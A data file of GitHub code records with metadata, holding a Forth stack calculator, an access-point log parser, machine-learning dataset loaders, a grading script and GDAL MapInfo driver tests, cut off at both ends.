receive\nsock_.close()\nprint(msg.decode(\"ascii\"))","repo_name":"jcprimo/python-training","sub_path":"penetration-test/TCP/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39060236913","text":"import sys\nsys.stdin = open('sample_forth.txt', 'r')\n\nN = int(input())\nfor i in range(1, N+1):\n num_list = list(input().split())\n stack = []\n oper = []\n for j in range(len(num_list)):\n if num_list[j].isdigit():\n stack.append(num_list[j])\n elif num_list[j] == '.':\n if len(stack) == 1 and len(oper) == 0:\n print('#{} {}'.format(i, stack[0]))\n else:\n print('#{} error'.format(i))\n else:\n oper.append(num_list[j])\n if len(stack) > 1:\n b = int(stack.pop())\n a = int(stack.pop())\n c = oper.pop(0)\n if c == '+':\n calc = a + b\n elif c == '-':\n calc = a - b\n elif c == '*':\n calc = a * b\n elif c == '/':\n calc = a / b\n stack.append(int(calc))\n else:\n print('#{} error'.format(i))\n break\n \n\n\n ","repo_name":"91hongppie/algorithm","sub_path":"stack2/forth.py","file_name":"forth.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"16685933264","text":"from __future__ import division\nimport csv\nimport os.path\nimport collections\nimport tldextract\nimport itertools\nfrom urllib.parse import urlsplit\nfrom urllib.parse import urlparse\nfrom datetime import datetime\nimport json\nimport timeit\nfrom pylab import plot, ylim, xlim, show, xlabel, ylabel, grid\nfrom numpy import linspace, loadtxt, ones, convolve\nimport numpy as numpy\n\nPATH_MAP = '/home/moojokeubuntu/KU/4_2/RealProject/accesspoint/Data/'\nPATH_TO_LOG = '/media/moojokeubuntu/AA6259046258D6A3/AnotherDrive/Project/accesslog/%s'\nPATH_TO_SAVE = '/home/moojokeubuntu/KU/4_2/RealProject/accesspoint/Log_per_build/LWAPP-3-REPLAY_ERR'\n\ndef raedfile():\n list_map_building = []\n compath = os.path.join(PATH_MAP, 'map_MAC.txt')\n with open(compath,'r') as f:\n for line in f :\n row_data = {}\n line_split = line.split(' ')\n print(len(line_split))\n AP_name = line_split[1]\n row_data['AP'] = AP_name\n row_data['ENG'] = line_split[0]\n list_map_building.append(row_data)\n\n readAP(list_map_building)\n\ndef readAP(list_map_building):\n list_AP = []\n list_ap_u = {}\n count = 0\n list_name = ['aplog-20180420'\n ,'aplog-20180421','aplog-20180422','aplog-20180423','aplog-20180424']\n for filename in list_name :\n with open (PATH_TO_LOG%(filename),'r') as file:\n for line in file:\n if 'count' in line :\n print(line)\n line_split = line.split(\" \")\n print(len(line_split))\n if len(line_split) == 28 :\n row_data = {}\n row_data['Month'] = line_split[0]\n row_data['Day'] = line_split[1]\n row_data['Time'] = line_split[2]\n row_data['Count'] = line_split[24]\n row_data['AP'] = line_split[27]\n print(row_data['Count'])\n print(row_data['AP'])\n list_AP.append(row_data)\n \n mac_to_ap(list_map_building,list_AP)\n\ndef mac_to_ap(list_map_building,list_AP):\n for i in range(len(list_AP)):\n for j in range(len(list_map_building)):\n if list_AP[i][\"AP\"] == list_map_building[j][\"AP\"]:\n list_AP[i][\"AP\"] = list_map_building[j][\"ENG\"]\n print(list_AP[i][\"AP\"])\n\n save_to(list_AP)\n \n\ndef save_to(list_AP):\n compath = os.path.join(PATH_TO_SAVE, '20to24.txt')\n with open(compath,'a') as f:\n for i in range(len(list_AP)):\n f.writelines(str(list_AP[i][\"Month\"])+\" \"\n +str(list_AP[i][\"Day\"])+\n \" \"+str(list_AP[i][\"Time\"])+\" \"+str(list_AP[i][\"AP\"])+\n \" \"+str(list_AP[i][\"Count\"])+'\\n')\n\n\n\n\ndef movingaverage(interval, window_size):\n\n window= numpy.ones(int(window_size))/float(window_size)\n return numpy.convolve(interval, window, 'same')\n\n\n \n \n \n # print(row_data['Month'])\n # #print(line_split)\n # print(len(line_split))\n # if len(line_split) not in list_ap_u.keys():\n # list_ap_u.update({len(line_split):line})\n # if len(line_split) == 28 :\n # count += 1\n # # with open (\"aa.txt\",'a') as f:\n # # for a in list_ap_u.keys():\n # # f.writelines(str(a)+\" \"+list_ap_u[a]+'\\n')\n # # print(list_ap_u)\n # print(count)\n\nif __name__ == '__main__':\n raedfile()\n #readAP() ","repo_name":"MooSithichai/Analysis_of_Unusual_Internet_Usage","sub_path":"AccessPoint/repreat_log.py","file_name":"repreat_log.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71427893162","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os\nimport gzip\nimport zipfile\nimport tarfile\n\nimport numpy as np\nimport skimage\nfrom skimage import io, transform\nimport six\nfrom six.moves import urllib, range\nfrom six.moves import cPickle as pickle\n\n\ndef standardize(data_train, data_test):\n \"\"\"\n Standardize a dataset to have zero mean and unit standard deviation.\n\n :param data_train: 2-D Numpy array. Training data.\n :param data_test: 2-D Numpy array. Test data.\n\n :return: (train_set, test_set, mean, std), The standardized dataset and\n their mean and standard deviation before processing.\n \"\"\"\n std = np.std(data_train, 0, keepdims=True)\n std[std == 0] = 1\n mean = np.mean(data_train, 0, keepdims=True)\n data_train_standardized = (data_train - mean) / std\n data_test_standardized = (data_test - mean) / std\n mean, std = np.squeeze(mean, 0), np.squeeze(std, 0)\n return data_train_standardized, data_test_standardized, mean, std\n\n\ndef to_one_hot(x, depth):\n \"\"\"\n Get one-hot representation of a 1-D numpy array of integers.\n\n :param x: 1-D Numpy array of type int.\n :param depth: A int.\n\n :return: 2-D Numpy array of type int.\n \"\"\"\n ret = np.zeros((x.shape[0], depth))\n ret[np.arange(x.shape[0]), x] = 1\n return ret\n\n\ndef download_dataset(url, path):\n print('Downloading data from %s' % url)\n urllib.request.urlretrieve(url, path)\n\n\ndef load_mnist_realval(path, one_hot=True, dequantify=False):\n \"\"\"\n Loads the real valued MNIST dataset.\n\n :param path: Path to the dataset file.\n :param one_hot: Whether to use one-hot representation for the labels.\n :param dequantify: Whether to add uniform noise to dequantify the data\n following (Uria, 2013).\n\n :return: The MNIST dataset.\n \"\"\"\n if not os.path.isfile(path):\n data_dir = os.path.dirname(path)\n if not os.path.exists(os.path.dirname(path)):\n os.makedirs(data_dir)\n download_dataset('http://www.iro.umontreal.ca/~lisa/deep/data/mnist'\n '/mnist.pkl.gz', path)\n\n f = gzip.open(path, 'rb')\n if six.PY2:\n train_set, valid_set, test_set = pickle.load(f)\n else:\n train_set, valid_set, test_set = pickle.load(f, encoding='latin1')\n f.close()\n x_train, t_train = train_set[0], train_set[1]\n x_valid, t_valid = valid_set[0], valid_set[1]\n x_test, t_test = test_set[0], test_set[1]\n if dequantify:\n x_train += np.random.uniform(0, 1. / 256,\n size=x_train.shape).astype('float32')\n x_valid += np.random.uniform(0, 1. / 256,\n size=x_valid.shape).astype('float32')\n x_test += np.random.uniform(0, 1. / 256,\n size=x_test.shape).astype('float32')\n n_y = t_train.max() + 1\n t_transform = (lambda x: to_one_hot(x, n_y)) if one_hot else (lambda x: x)\n return x_train, t_transform(t_train), x_valid, t_transform(t_valid), \\\n x_test, t_transform(t_test)\n\n\ndef load_uci_datasets(path, rng, delimiter=None, dtype=np.float32):\n data = np.loadtxt(path, delimiter=delimiter)\n data = data.astype(dtype)\n permutation = rng.choice(np.arange(data.shape[0]),\n data.shape[0], replace=False)\n size_train = int(np.round(data.shape[0] * 0.8))\n size_test = int(np.round(data.shape[0] * 0.9))\n index_train = permutation[0: size_train]\n index_val = permutation[size_train: size_test]\n index_test = permutation[size_test:]\n\n # np.savetxt(\"index_train.txt\", index_train, fmt='%d')\n # np.savetxt(\"index_test.txt\", index_test, fmt='%d')\n\n X_train, y_train = data[index_train, :-1], data[index_train, -1]\n X_val, y_val = data[index_val, :-1], data[index_val, -1]\n X_test, y_test = data[index_test, :-1], data[index_test, -1]\n\n return X_train, y_train, X_val, y_val, X_test, y_test\n\n\nclass CelebADataset(object):\n def __init__(self, path=\"data/celebA/img_align_celeba.zip\", crop=True):\n self.f = zipfile.ZipFile(path, 'r')\n self.data_files = [i for i in self.f.namelist() if i[-1] != '/']\n if len(self.data_files) < 100000:\n print(\"Only %d images found for celebA, is this right?\" % len(\n self.data_files))\n exit(-1)\n self.train_size = int(np.floor(len(self.data_files) * 0.8))\n self.test_size = len(self.data_files) - self.train_size\n self.train_img = self.data_files[:self.train_size]\n self.test_img = self.data_files[self.train_size:]\n\n self.train_idx = 0\n self.test_idx = 0\n self.data_dims = [64, 64, 3]\n\n self.train_cache = np.ndarray((self.train_size, 64, 64, 3),\n dtype=np.float32)\n self.train_cache_top = 0\n self.test_cache = np.ndarray((self.test_size, 64, 64, 3),\n dtype=np.float32)\n self.test_cache_top = 0\n self.range = [-1.0, 1.0]\n self.is_crop = crop\n self.name = \"celebA\"\n\n \"\"\" Return [batch_size, 64, 64, 3] data array \"\"\"\n def next_batch(self, batch_size):\n # sample_files = self.data[0:batch_size]\n prev_idx = self.train_idx\n self.train_idx += batch_size\n if self.train_idx > self.train_size:\n self.train_idx = batch_size\n prev_idx = 0\n\n if self.train_idx < self.train_cache_top:\n return self.train_cache[prev_idx:self.train_idx, :, :, :]\n else:\n sample_files = self.train_img[prev_idx:self.train_idx]\n sample = [self.get_image(sample_file, self.is_crop)\n for sample_file in sample_files]\n sample_images = np.array(sample).astype(np.float32)\n self.train_cache[prev_idx:self.train_idx] = sample_images\n self.train_cache_top = self.train_idx\n return sample_images\n\n def next_test_batch(self, batch_size):\n prev_idx = self.test_idx\n self.test_idx += batch_size\n if self.test_idx > self.test_size:\n self.test_idx = batch_size\n prev_idx = 0\n\n if self.test_idx < self.test_cache_top:\n return self.test_cache[prev_idx:self.test_idx, :, :, :]\n else:\n sample_files = self.test_img[prev_idx:self.test_idx]\n sample = [self.get_image(sample_file, self.is_crop)\n for sample_file in sample_files]\n sample_images = np.array(sample).astype(np.float32)\n self.test_cache[prev_idx:self.test_idx] = sample_images\n self.test_cache_top = self.test_idx\n return sample_images\n\n def batch_by_index(self, batch_start, batch_end):\n sample_files = self.data_files[batch_start:batch_end]\n sample = [self.get_image(sample_file) for sample_file in sample_files]\n sample_images = np.array(sample).astype(np.float32)\n return sample_images\n\n def get_image(self, image_path, is_crop=True):\n file = self.f.open(image_path)\n raw = skimage.img_as_float(io.imread(file))\n image = CelebADataset.transform(raw, is_crop=is_crop)\n return image\n\n @staticmethod\n def center_crop(x, crop_h, crop_w=None, resize_w=64):\n if crop_w is None:\n crop_w = crop_h\n h, w = x.shape[:2]\n j = int(round((h - crop_h) / 2.))\n i = int(round((w - crop_w) / 2.))\n return transform.resize(x[j:j + crop_h, i:i + crop_w],\n [resize_w, resize_w])\n\n @staticmethod\n def full_crop(x):\n if x.shape[0] <= x.shape[1]:\n lb = int((x.shape[1] - x.shape[0]) / 2)\n ub = lb + x.shape[0]\n x = transform.resize(x[:, lb:ub], [64, 64])\n else:\n lb = int((x.shape[0] - x.shape[1]) / 2)\n ub = lb + x.shape[1]\n x = transform.resize(x[lb:ub, :], [64, 64])\n return x\n\n @staticmethod\n def transform(image, npx=148, is_crop=True, resize_w=64):\n # npx : # of pixels width/height of image\n if is_crop:\n cropped_image = CelebADataset.center_crop(image, npx,\n resize_w=resize_w)\n else:\n cropped_image = CelebADataset.full_crop(image)\n return cropped_image\n\n def reset(self):\n self.idx = 0\n\ndef load_cifar10(path, normalize=True, dequantify=False, one_hot=True):\n \"\"\"\n Loads the cifar10 dataset.\n\n :param path: Path to the dataset file.\n :param normalize: Whether to normalize the x data to the range [0, 1].\n :param dequantify: Whether to add uniform noise to dequantify the data\n following (Uria, 2013).\n :param one_hot: Whether to use one-hot representation for the labels.\n\n :return: The cifar10 dataset.\n \"\"\"\n if not os.path.isfile(path):\n data_dir = os.path.dirname(path)\n if not os.path.exists(os.path.dirname(path)):\n os.makedirs(data_dir)\n download_dataset(\n 'http://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz', path)\n\n data_dir = os.path.dirname(path)\n batch_dir = os.path.join(data_dir, 'cifar-10-batches-py')\n if not os.path.isfile(os.path.join(batch_dir, 'data_batch_5')):\n with tarfile.open(path) as tar:\n tar.extractall(data_dir)\n\n train_x, train_y = [], []\n for i in range(1, 6):\n batch_file = os.path.join(batch_dir, 'data_batch_' + str(i))\n with open(batch_file, 'rb') as f:\n if six.PY2:\n data = pickle.load(f)\n else:\n data = pickle.load(f, encoding='latin1')\n train_x.append(data['data'])\n train_y.append(data['labels'])\n train_x = np.vstack(train_x)\n train_y = np.hstack(train_y)\n\n test_batch_file = os.path.join(batch_dir, 'test_batch')\n with open(test_batch_file, 'rb') as f:\n if six.PY2:\n data = pickle.load(f)\n else:\n data = pickle.load(f, encoding='latin1')\n test_x = data['data']\n test_y = np.asarray(data['labels'])\n\n train_x = train_x.astype('float32')\n test_x = test_x.astype('float32')\n if dequantify:\n train_x += np.random.uniform(0, 1,\n size=train_x.shape).astype('float32')\n test_x += np.random.uniform(0, 1, size=test_x.shape).astype('float32')\n if normalize:\n train_x = train_x / 256\n test_x = test_x / 256\n\n train_x = train_x.reshape((50000, 3, 32, 32)).transpose(0, 2, 3, 1)\n test_x = test_x.reshape((10000, 3, 32, 32)).transpose(0, 2, 3, 1)\n t_transform = (lambda x: to_one_hot(x, 10)) if one_hot else (lambda x: x)\n return train_x, t_transform(train_y), test_x, t_transform(test_y)\n","repo_name":"thjashin/spectral-stein-grad","sub_path":"utils/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":10854,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"19"} +{"seq_id":"4807310043","text":"file_1 =open(\"default_results.txt\", \"r\")\r\nfile_2 =open(\"results.txt\", \"r\")\r\ncontent1 = file_1.read()\r\ncontent2 = file_2.read()\r\nlist1 = content1.split(\"\\n\")\r\nlist2 = content2.split(\"\\n\")\r\ncounter1 = 0\r\ncounter2 = 0\r\nfor i in list1:\r\n\tif i:\r\n\t\tcounter1 = counter1 + 1;\r\nfor j in list2:\r\n\tif j:\r\n\t\tcounter2 = counter2 + 1;\r\nline_1 = \"default test cases:\" + str(counter1) + \" result test cases:\" + str(counter2)\r\n\r\nline_2 = \"\\n\"\r\nline_3 = \"default_results and student results differ in \" + str(sum(zipline[0]!=zipline[1] for zipline in zip(open('default_results.txt'), open('results.txt'))))+ \" lines\"\r\n\r\nline_4 = \"\\n\"\r\nline_5 = \"Percentage:\" + str(100 - (sum(zipline[0]!=zipline[1] for zipline in zip(open('default_results.txt'), open('results.txt')))/counter1)*100)\r\nwith open(\"exam_results.txt\",\"w\") as out:\r\n\tout.writelines([line_1,line_2,line_3,line_4,line_5])\r\nif (100 - (sum(zipline[0]!=zipline[1] for zipline in zip(open('default_results.txt'), open('results.txt')))/counter1)*100 > 40):\r\n\tprint(\"You Passed : \" + str(100 - (sum(zipline[0]!=zipline[1] for zipline in zip(open('default_results.txt'), open('results.txt')))/counter1)*100) + \"%\")\r\nelse:\r\n\tprint(\"You Failed\")\r\n","repo_name":"sudhamshu091/Automation-of-HDL-Lab-evaluation-using-scripts","sub_path":"test/and_gate/sim/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"38151078607","text":"import os\nimport random\nimport shutil\nimport sys\nimport time\n\nimport gdaltest\nimport ogrtest\nimport pytest\nimport test_cli_utilities\n\nfrom osgeo import gdal, ogr, osr\n\npytestmark = pytest.mark.require_driver(\"MapInfo File\")\n\n###############################################################################\n@pytest.fixture(autouse=True, scope=\"module\")\ndef module_disable_exceptions():\n with gdaltest.disable_exceptions():\n yield\n\n\n###############################################################################\n# Create table from data/poly.shp\n\n\n@pytest.fixture()\ndef mapinfo_ds(request, tmp_path, poly_feat):\n\n ds_loc = tmp_path\n\n if hasattr(request, \"param\"):\n if request.param == \"MIF\":\n ds_loc = tmp_path / \"wrk.mif\"\n else:\n assert request.param == \"TAB\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(ds_loc)\n\n # This should convert to MapInfo datum name 'New_Zealand_GD49'\n WEIRD_SRS = 'PROJCS[\"NZGD49 / UTM zone 59S\",GEOGCS[\"NZGD49\",DATUM[\"NZGD49\",SPHEROID[\"International 1924\",6378388,297,AUTHORITY[\"EPSG\",\"7022\"]],TOWGS84[59.47,-5.04,187.44,0.47,-0.1,1.024,-4.5993],AUTHORITY[\"EPSG\",\"6272\"]],PRIMEM[\"Greenwich\",0,AUTHORITY[\"EPSG\",\"8901\"]],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]],AUTHORITY[\"EPSG\",\"4272\"]],PROJECTION[\"Transverse_Mercator\"],PARAMETER[\"latitude_of_origin\",0],PARAMETER[\"central_meridian\",171],PARAMETER[\"scale_factor\",0.9996],PARAMETER[\"false_easting\",500000],PARAMETER[\"false_northing\",10000000],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]],AXIS[\"Easting\",EAST],AXIS[\"Northing\",NORTH],AUTHORITY[\"EPSG\",\"27259\"]]'\n mapinfo_srs = osr.SpatialReference()\n mapinfo_srs.ImportFromWkt(WEIRD_SRS)\n\n #######################################################\n # Create memory Layer\n mapinfo_lyr = ds.CreateLayer(\"tpoly\", mapinfo_srs)\n\n #######################################################\n # Setup Schema\n ogrtest.quick_create_layer_def(\n mapinfo_lyr,\n [(\"AREA\", ogr.OFTReal), (\"EAS_ID\", ogr.OFTInteger), (\"PRFEDEA\", ogr.OFTString)],\n )\n\n #######################################################\n # Copy in poly.shp\n\n dst_feat = ogr.Feature(feature_def=mapinfo_lyr.GetLayerDefn())\n\n for feat in poly_feat:\n\n dst_feat.SetFrom(feat)\n mapinfo_lyr.CreateFeature(dst_feat)\n\n #######################################################\n # Close file.\n\n ds = None\n\n return tmp_path\n\n\n###############################################################################\n# Verify that stuff we just wrote is still OK.\n#\n# Note that we allow a fairly significant error since projected\n# coordinates are not stored with much precision in Mapinfo format.\n\n\n@pytest.mark.parametrize(\"mapinfo_ds\", (\"TAB\", \"MIF\"), indirect=True)\ndef test_ogr_mitab_3(mapinfo_ds, poly_feat):\n\n ds = ogr.Open(mapinfo_ds)\n mapinfo_lyr = ds.GetLayer(0)\n\n expect = [168, 169, 166, 158, 165]\n\n with ogrtest.attribute_filter(mapinfo_lyr, \"EAS_ID < 170\"):\n ogrtest.check_features_against_list(mapinfo_lyr, \"EAS_ID\", expect)\n\n for i in range(len(poly_feat)):\n orig_feat = poly_feat[i]\n read_feat = mapinfo_lyr.GetNextFeature()\n\n ogrtest.check_feature_geometry(\n read_feat, orig_feat.GetGeometryRef(), max_error=0.02, context=f\"i={i}\"\n )\n\n for fld in range(3):\n assert orig_feat.GetField(fld) == read_feat.GetField(fld), (\n \"Attribute %d does not match\" % fld\n )\n\n\n###############################################################################\n# Test ExecuteSQL() results layers with geometry.\n\n\ndef test_ogr_mitab_4(mapinfo_ds):\n\n ds = ogr.Open(mapinfo_ds)\n\n with ds.ExecuteSQL(\"select * from tpoly where prfedea = '35043413'\") as sql_lyr:\n\n ogrtest.check_features_against_list(sql_lyr, \"prfedea\", [\"35043413\"])\n\n sql_lyr.ResetReading()\n feat_read = sql_lyr.GetNextFeature()\n ogrtest.check_feature_geometry(\n feat_read,\n \"POLYGON ((479750.688 4764702.000,479658.594 4764670.000,479640.094 4764721.000,479735.906 4764752.000,479750.688 4764702.000))\",\n max_error=0.02,\n )\n\n\n###############################################################################\n# Test spatial filtering.\n\n\ndef test_ogr_mitab_5(mapinfo_ds):\n\n ds = ogr.Open(mapinfo_ds)\n mapinfo_lyr = ds.GetLayer(0)\n\n with ogrtest.spatial_filter(mapinfo_lyr, 479505, 4763195, 480526, 4762819):\n\n ogrtest.check_features_against_list(mapinfo_lyr, \"eas_id\", [158])\n\n\n###############################################################################\n# Verify that Non-WGS84 datums are populated correctly\n\n\ndef test_ogr_mitab_6(mapinfo_ds):\n\n ds = ogr.Open(mapinfo_ds)\n mapinfo_lyr = ds.GetLayer(0)\n\n srs = mapinfo_lyr.GetSpatialRef()\n datum_name = srs.GetAttrValue(\"PROJCS|GEOGCS|DATUM\")\n\n assert datum_name == \"New_Zealand_GD49\", (\n \"Datum name does not match (expected 'New_Zealand_GD49', got '%s')\" % datum_name\n )\n\n\n###############################################################################\n# Read mif file with 2 character .mid delimiter and verify operation.\n\n\ndef test_ogr_mitab_10():\n\n ds = ogr.Open(\"data/mitab/small.mif\")\n lyr = ds.GetLayer(0)\n\n feat = lyr.GetNextFeature()\n\n assert feat.NAME == \" S. 11th St.\", \"name attribute wrong.\"\n\n assert feat.FLOODZONE == 10, \"FLOODZONE attribute wrong.\"\n\n ogrtest.check_feature_geometry(\n feat,\n \"POLYGON ((407131.721 155322.441,407134.468 155329.616,407142.741 155327.242,407141.503 155322.467,407140.875 155320.049,407131.721 155322.441))\",\n max_error=0.000000001,\n )\n\n feat = lyr.GetNextFeature()\n\n assert feat.OWNER == 'Guarino \"Chucky\" Sandra', \"owner attribute wrong.\"\n\n lyr = None\n ds = None\n\n\n###############################################################################\n# Verify support for NTF datum with non-greenwich datum per\n# http://trac.osgeo.org/gdal/ticket/1416\n#\n# This test also exercises SRS reference counting as described in issue:\n# http://trac.osgeo.org/gdal/ticket/1680\n\n\ndef test_ogr_mitab_11():\n\n ds = ogr.Open(\"data/mitab/small_ntf.mif\")\n srs = ds.GetLayer(0).GetSpatialRef()\n ds = None\n\n pm_value = srs.GetAttrValue(\"PROJCS|GEOGCS|PRIMEM\", 1)\n assert pm_value[:6] == \"2.3372\", (\n \"got unexpected prime meridian, not paris: \" + pm_value\n )\n\n\n###############################################################################\n# Verify that a newly created mif layer returns a non null layer definition\n\n\ndef test_ogr_mitab_12(tmp_path):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_path, options=[\"FORMAT=MIF\"]\n )\n lyr = ds.CreateLayer(\"testlyrdef\")\n defn = lyr.GetLayerDefn()\n\n assert defn is not None\n\n ogrtest.quick_create_layer_def(lyr, [(\"AREA\", ogr.OFTReal)])\n\n ds = None\n\n\n###############################################################################\n# Verify that field widths and precisions are propagated correctly in TAB and MIF\n\n\n@pytest.mark.parametrize(\"fmt\", (\"TAB\", \"MIF\"))\ndef test_ogr_mitab_13(tmp_path, fmt):\n\n ds = ogr.Open(\"../ogr/data/mitab/testlyrdef.gml\")\n if ds is None:\n pytest.skip()\n\n if test_cli_utilities.get_ogr2ogr_path() is None:\n pytest.skip()\n\n fname = tmp_path / (\"testlyrdef.\" + fmt.lower())\n\n if fmt == \"MIF\":\n dsco = \"-dsco FORMAT=MIF\"\n else:\n dsco = \"\"\n\n gdaltest.runexternal(\n test_cli_utilities.get_ogr2ogr_path()\n + f' -f \"MapInfo File\" {dsco} {fname} ../ogr/data/mitab/testlyrdef.gml'\n )\n\n ds = ogr.Open(fname)\n\n # Check if the width and precision are as preserved.\n lyr = ds.GetLayer(\"testlyrdef\")\n assert lyr is not None, \"Layer missing.\"\n\n defn = lyr.GetLayerDefn()\n\n data = [\n [\"AREA\", ogr.OFTReal, 9, 4],\n [\"VOLUME\", ogr.OFTReal, 0, 0],\n [\"LENGTH\", ogr.OFTInteger, 10, 0],\n [\"WIDTH\", ogr.OFTInteger, 4, 0],\n ]\n\n for field in data:\n fld = defn.GetFieldDefn(defn.GetFieldIndex(field[0]))\n\n if fmt == \"MIF\" and fld.GetType() == ogr.OFTInteger:\n expected_width = 0\n else:\n expected_width = field[2]\n\n assert fld.GetType() == field[1], f\"{field[0]} field type wrong.\"\n assert fld.GetWidth() == expected_width, f\"{field[0]} field width wrong.\"\n\n assert fld.GetPrecision() == field[3], f\"{field[0]} field precision wrong.\"\n\n ds = None\n\n\n###############################################################################\n# Test .mif without .mid (#5141)\n\n\ndef test_ogr_mitab_15(tmp_vsimem):\n\n ds = ogr.Open(\"data/mitab/nomid.mif\")\n lyr = ds.GetLayer(0)\n feat = lyr.GetNextFeature()\n assert feat is not None\n ds = None\n\n # Test opening .mif without .mid even if there are declared attributes\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(tmp_vsimem / \"nomid.mif\")\n lyr = ds.CreateLayer(\"empty\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetField(0, 1)\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(1 2)\"))\n lyr.CreateFeature(f)\n ds = None\n\n gdal.Unlink(tmp_vsimem / \"nomid.mid\")\n ds = ogr.Open(tmp_vsimem / \"nomid.mif\")\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n if f.IsFieldSet(0) or f.GetGeometryRef() is None:\n f.DumpReadable()\n pytest.fail()\n\n\n###############################################################################\n# Test empty .mif\n\n\ndef test_ogr_mitab_16(tmp_path):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(tmp_path / \"empty.mif\")\n lyr = ds.CreateLayer(\"empty\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n ds = None\n\n ds = ogr.Open(tmp_path / \"empty.mif\")\n assert ds is not None\n ds = None\n\n\n###############################################################################\n# Run test_ogrsf\n\n\n@pytest.mark.parametrize(\"mapinfo_ds\", (\"MIF\", \"TAB\"), indirect=True)\ndef test_ogr_mitab_17(mapinfo_ds):\n\n if test_cli_utilities.get_test_ogrsf_path() is None:\n pytest.skip()\n\n ret = gdaltest.runexternal(\n test_cli_utilities.get_test_ogrsf_path() + \" \" + str(mapinfo_ds)\n )\n assert ret.find(\"INFO\") != -1 and ret.find(\"ERROR\") == -1\n\n\n###############################################################################\n# Test EPSG:2154\n# (https://github.com/mapgears/mitab/issues/1)\n\n\ndef test_ogr_mitab_18(tmp_vsimem):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_vsimem / \"ogr_mitab_18.tab\"\n )\n sr = osr.SpatialReference()\n sr.ImportFromEPSG(2154)\n lyr = ds.CreateLayer(\"test\", srs=sr)\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n ds = None\n\n # Test with our generated file, and with one generated by MapInfo\n for filename in [\n tmp_vsimem / \"ogr_mitab_18.tab\",\n \"data/mitab/lambert93_francais.TAB\",\n ]:\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n sr_got = lyr.GetSpatialRef()\n wkt = sr_got.ExportToWkt()\n if \"2154\" not in wkt:\n print(filename)\n pytest.fail(sr_got)\n proj4 = sr_got.ExportToProj4()\n assert proj4.startswith(\n \"+proj=lcc +lat_0=46.5 +lon_0=3 +lat_1=49 +lat_2=44 +x_0=700000 +y_0=6600000 +ellps=GRS80 +towgs84=0,0,0,0,0,0,0 +units=m +no_defs\"\n )\n ds = None\n\n\n###############################################################################\n# Check that we correctly round coordinate to the appropriate precision\n# (https://github.com/mapgears/mitab/issues/2)\n\n\ndef test_ogr_mitab_19():\n\n ds = ogr.Open(\"data/mitab/utm31.TAB\")\n lyr = ds.GetLayer(0)\n feat = lyr.GetNextFeature()\n # Strict text comparison to check precision\n if feat.GetGeometryRef().ExportToWkt() != \"POINT (485248.12 2261.45)\":\n feat.DumpReadable()\n pytest.fail()\n\n\n###############################################################################\n# Check that we take into account the user defined bound file\n# (https://github.com/mapgears/mitab/issues/3)\n# Also test BOUNDS layer creation option (http://trac.osgeo.org/gdal/ticket/5642)\n\n\n@pytest.mark.parametrize(\"fmt\", (\"TAB\", \"MIF\"))\n@pytest.mark.parametrize(\"i\", (1, 2, 3, 4, 5, 6, 7))\ndef test_ogr_mitab_20(tmp_vsimem, tmp_path, fmt, i):\n\n # Pass i==0: without MITAB_BOUNDS_FILE\n # Pass i==1: with MITAB_BOUNDS_FILE and French bounds : first load\n # Pass i==2: with MITAB_BOUNDS_FILE and French bounds : should use already loaded file\n # Pass i==3: without MITAB_BOUNDS_FILE : should unload the file\n # Pass i==4: use BOUNDS layer creation option\n # Pass i==5: with MITAB_BOUNDS_FILE and European bounds\n # Pass i==6: with MITAB_BOUNDS_FILE and generic EPSG:2154 (Europe bounds expected)\n\n if i == 1 or i == 2 or i == 5 or i == 6:\n gdal.SetConfigOption(\"MITAB_BOUNDS_FILE\", \"data/mitab/mitab_bounds.txt\")\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_vsimem / (\"ogr_mitab_20.\" + fmt.lower())\n )\n sr = osr.SpatialReference()\n if i == 1 or i == 2: # French bounds\n sr.SetFromUserInput(\n \"\"\"PROJCS[\"RGF93 / Lambert-93\",\n GEOGCS[\"RGF93\",\n DATUM[\"Reseau_Geodesique_Francais_1993\",\n SPHEROID[\"GRS 80\",6378137,298.257222101],\n TOWGS84[0,0,0,0,0,0,0]],\n PRIMEM[\"Greenwich\",0],\n UNIT[\"degree\",0.0174532925199433]],\n PROJECTION[\"Lambert_Conformal_Conic_2SP\"],\n PARAMETER[\"standard_parallel_1\",49.00000000002],\n PARAMETER[\"standard_parallel_2\",44],\n PARAMETER[\"latitude_of_origin\",46.5],\n PARAMETER[\"central_meridian\",3],\n PARAMETER[\"false_easting\",700000],\n PARAMETER[\"false_northing\",6600000],\n UNIT[\"Meter\",1.0],\n AUTHORITY[\"EPSG\",\"2154\"]]\"\"\"\n )\n elif i == 5: # European bounds\n sr.SetFromUserInput(\n \"\"\"PROJCS[\"RGF93 / Lambert-93\",\n GEOGCS[\"RGF93\",\n 